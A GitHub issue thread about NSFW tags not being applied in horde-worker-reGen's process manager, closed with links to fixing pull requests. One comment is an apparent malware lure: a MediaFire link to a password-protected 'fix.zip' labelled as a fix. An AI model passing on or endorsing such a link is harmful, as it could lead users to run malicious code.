### ISSUE TITLE
Info nsfw tag not being applied

### ISSUE THREAD

**Issue by rbrtcs1** [Haidra-Org/horde-worker-reGen#299]
https://github.com/Haidra-Org/horde-worker-reGen/blob/76abd6be5a9e644c665f7126c07e2f21b2a3d75c/horde_worker_regen/process_management/process_manager.py#L1822

This code only runs if there was at least 1 image that was actually censored in the batch. This logic should probably be moved outside of the current if statement.

in the scenario where a worker marks an image as nsfw but doesn’t censor it, this code would not run.

**Comment by SagarChandra07** [comment]
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme

you may need to install the c compiler

**Comment by arcaria** [comment]
I don't even wanna open that link, what is that?

**Comment by tazlin** [comment]
Fixed via https://github.com/Haidra-Org/horde-worker-reGen/pull/300, https://github.com/Haidra-Org/AI-Horde/pull/459 and https://github.com/Haidra-Org/AI-Horde/pull/457.
